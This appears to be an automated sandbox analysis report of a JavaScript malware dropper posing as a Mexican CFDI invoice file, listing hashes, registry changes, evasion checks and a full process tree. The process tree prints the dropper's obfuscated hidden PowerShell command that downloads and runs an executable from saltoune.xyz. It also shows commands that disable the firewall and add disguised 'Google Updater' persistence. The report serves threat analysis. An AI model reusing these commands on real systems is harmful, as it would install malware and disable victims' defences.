Analysis
max time kernel: 298s
max time network: 300s
platform: windows10_x64
resource: win10v20210408
submitted: 28-06-2021 16:28
Static task: static1
Behavioral task: behavioral1
Sample: CFDI 1675442 76821.js
Resource: win7v20210408
General
Target: CFDI 1675442 76821.js
Size: 34KB
MD5: fef5d85788af40d874612dab6910f000
SHA1: e0510f670e82ccfd1f6d74e925fbe170c7625846
SHA256: 4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264
SHA512: d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2
Malware Config
Extracted: https://saltoune.xyz/pb/aa.exe
Signatures

Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
- explorer.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
- explorer.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"
- explorer.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
- explorer.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"

Blocklisted process makes network request 1 IoCs
Processes:
- powershell.exe (PID 3320): flow 13

Downloads MZ/PE file

Executes dropped EXE 6 IoCs
Processes:
- Tempkmt12.exe (PID 1208)
- unpakedree.exe (PID 2304)
- xc829374091FD.exe (PID 3472)
- xc829374091FD.exe (PID 4344)
- a51a7aye13w3cg_1.exe (PID 2208)
- ca5yyu7i79mo.exe (PID 4548)

Sets file execution options in registry 2 TTPs

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
- explorer.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe"
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- explorer.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\""
- explorer.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- explorer.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.09 = "\"C:\\ProgramData\\Google Updater 2.09\\a51a7aye13w3cg.exe\""
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Checks whether UAC is enabled 2 IoCs
Processes:
- xc829374091FD.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
- cmd.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Drops desktop.ini file(s) 1 IoCs
Processes:
- explorer.exe: File opened for modification C:\ProgramData\Google Updater 2.09\desktop.ini

Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
- cmd.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum
- cmd.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
Processes:
- xc829374091FD.exe (PID 4344), 1 entry
- explorer.exe (PID 4612), 10 entries

Suspicious use of SetThreadContext 2 IoCs
Processes:
- PID 3472 (xc829374091FD.exe) set thread context of PID 4344 (procid_target 96)
- PID 2208 (a51a7aye13w3cg_1.exe) set thread context of 0

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- xc829374091FD.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- xc829374091FD.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- explorer.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Delays execution with timeout.exe 5 IoCs
Processes:
- timeout.exe (PID 4236)
- timeout.exe (PID 1860)
- timeout.exe (PID 2516)
- timeout.exe (PID 3004)
- timeout.exe (PID 4292)

Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
- explorer.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- explorer.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer

Kills process with taskkill 2 IoCs
Processes:
- taskkill.exe (PID 4372)
- taskkill.exe (PID 4404)

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
Processes:
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
Processes:
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"

Modifies Internet Explorer settings 3 IoCs
Processes:
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager
- explorer.exe: Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\DownloadVersionList = "0"

Modifies registry class 2 IoCs
Processes:
- Tempkmt12.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings
- cmd.exe: Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings

NTFS ADS 2 IoCs
Processes:
- explorer.exe: File opened for modification C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78
- explorer.exe: File created C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe:14EDFC78

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 59 IoCs
Processes:
- powershell.exe (PID 3320), 3 entries
- explorer.exe (PID 4612), 56 entries

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- ca5yyu7i79mo.exe (PID 4548)
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
- xc829374091FD.exe (PID 4344), 2 entries
- explorer.exe (PID 4612), 2 entries

Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
- powershell.exe (PID 3320): SeDebugPrivilege
- taskkill.exe (PID 4372): SeDebugPrivilege
- xc829374091FD.exe (PID 4344): SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeLoadDriverPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeTakeOwnershipPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeMachineAccountPrivilege, SeSecurityPrivilege, SeAssignPrimaryTokenPrivilege, SeCreateGlobalPrivilege, 33
- taskkill.exe (PID 4404): SeDebugPrivilege
- explorer.exe (PID 4612): SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeLoadDriverPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeTakeOwnershipPrivilege, SeChangeNotifyPrivilege, SeCreateTokenPrivilege, SeMachineAccountPrivilege, SeSecurityPrivilege, SeAssignPrimaryTokenPrivilege, SeCreateGlobalPrivilege, 33

Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- ca5yyu7i79mo.exe (PID 4548)

Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- ca5yyu7i79mo.exe (PID 4548), 2 entries

Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID and image -> target PID, procid_target, number of entries):
- 4648 wscript.exe -> 4252 (77), x2
- 4252 cmd.exe -> 3320 (79), x2
- 4252 cmd.exe -> 1208 (81), x3
- 1208 Tempkmt12.exe -> 1220 (82), x3
- 1220 WScript.exe -> 1580 (83), x3
- 1580 cmd.exe -> 1860 (85), x3
- 1580 cmd.exe -> 1528 (86), x3
- 1580 cmd.exe -> 2304 (87), x3
- 1580 cmd.exe -> 2516 (88), x3
- 1580 cmd.exe -> 2704 (89), x3
- 1580 cmd.exe -> 3004 (90), x3
- 2704 WScript.exe -> 3180 (91), x3
- 3180 cmd.exe -> 4072 (93), x3
- 3180 cmd.exe -> 4292 (94), x3
- 3180 cmd.exe -> 3472 (95), x3
- 3472 xc829374091FD.exe -> 4344 (96), x5
- 3180 cmd.exe -> 4372 (97), x3
- 3180 cmd.exe -> 4404 (99), x3
- 3180 cmd.exe -> 4600 (100), x3
- 3180 cmd.exe -> 4236 (101), x3
- 4344 xc829374091FD.exe -> 4612 (102), x3
- 4612 explorer.exe -> 3180 (91), x1

Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
- attrib.exe (PID 4600)
- attrib.exe (PID 4072)
Processes
[1] C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
    - Suspicious use of WriteProcessMemory
    PID: 4648
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
      - Suspicious use of WriteProcessMemory
      PID: 4252
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3320
    [3] C:\Users\Admin\AppData\Local\Tempkmt12.exe
        C:\Users\Admin\AppData\Local\Tempkmt12.exe
        - Executes dropped EXE
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        PID: 1208
      [4] C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
          - Suspicious use of WriteProcessMemory
          PID: 1220
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\183.bat" "
            - Modifies registry class
            - Suspicious use of WriteProcessMemory
            PID: 1580
          [6] C:\Windows\SysWOW64\timeout.exe
              timeout 0
              - Delays execution with timeout.exe
              PID: 1860
          [6] C:\Windows\SysWOW64\PING.EXE
              ping dhgfg sgudy
              - Runs ping.exe
              PID: 1528
          [6] C:\LMPupdate\set\unpakedree.exe
              "unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
              - Executes dropped EXE
              PID: 2304
          [6] C:\Windows\SysWOW64\timeout.exe
              timeout 5
              - Delays execution with timeout.exe
              PID: 2516
          [6] C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
              - Suspicious use of WriteProcessMemory
              PID: 2704
            [7] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\LMPupdate\set\48551.bat" "
                - Checks whether UAC is enabled
                - Maps connected drives based on registry
                - Suspicious use of WriteProcessMemory
                PID: 3180
              [8] C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\LMPupdate\set"
                  - Views/modifies file attributes
                  PID: 4072
              [8] C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  - Delays execution with timeout.exe
                  PID: 4292
              [8] C:\LMPupdate\set\xc829374091FD.exe
                  xc829374091FD.exe /start
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - Suspicious use of WriteProcessMemory
                  PID: 3472
                [9] C:\LMPupdate\set\xc829374091FD.exe
                    xc829374091FD.exe /start
                    - Executes dropped EXE
                    - Checks whether UAC is enabled
                    - Suspicious use of NtSetInformationThreadHideFromDebugger
                    - Checks processor information in registry
                    - Suspicious behavior: MapViewOfSection
                    - Suspicious use of AdjustPrivilegeToken
                    - Suspicious use of WriteProcessMemory
                    PID: 4344
                  [10] C:\Windows\SysWOW64\explorer.exe
                       C:\Windows\SysWOW64\explorer.exe
                       - Modifies firewall policy service
                       - Checks BIOS information in registry
                       - Adds Run key to start application
                       - Drops desktop.ini file(s)
                       - Suspicious use of NtSetInformationThreadHideFromDebugger
                       - Checks processor information in registry
                       - Enumerates system info in registry
                       - Modifies Internet Explorer Protected Mode
                       - Modifies Internet Explorer Protected Mode Banner
                       - Modifies Internet Explorer settings
                       - NTFS ADS
                       - Suspicious behavior: EnumeratesProcesses
                       - Suspicious behavior: MapViewOfSection
                       - Suspicious use of AdjustPrivilegeToken
                       - Suspicious use of WriteProcessMemory
                       PID: 4612
                    [11] C:\Users\Admin\AppData\Local\Temp\a51a7aye13w3cg_1.exe
                         /suac
                         - Executes dropped EXE
                         - Suspicious use of SetThreadContext
                         PID: 2208
                    [11] C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe
                         "C:\Users\Admin\AppData\Local\Temp\ca5yyu7i79mo.exe"
                         - Executes dropped EXE
                         - Suspicious behavior: GetForegroundWindowSpam
                         - Suspicious use of FindShellTrayWindow
                         - Suspicious use of SetWindowsHookEx
                         PID: 4548
              [8] C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im unpakedree.exe
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 4372
              [8] C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im unpakedree.exe
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 4404
              [8] C:\Windows\SysWOW64\attrib.exe
                  attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
                  - Views/modifies file attributes
                  PID: 4600
              [8] C:\Windows\SysWOW64\timeout.exe
                  timeout 4
                  - Delays execution with timeout.exe
                  PID: 4236
          [6] C:\Windows\SysWOW64\timeout.exe
              timeout 6
              - Delays execution with timeout.exe
              PID: 3004
Network
MITRE ATT&CK Enterprise v6
Downloads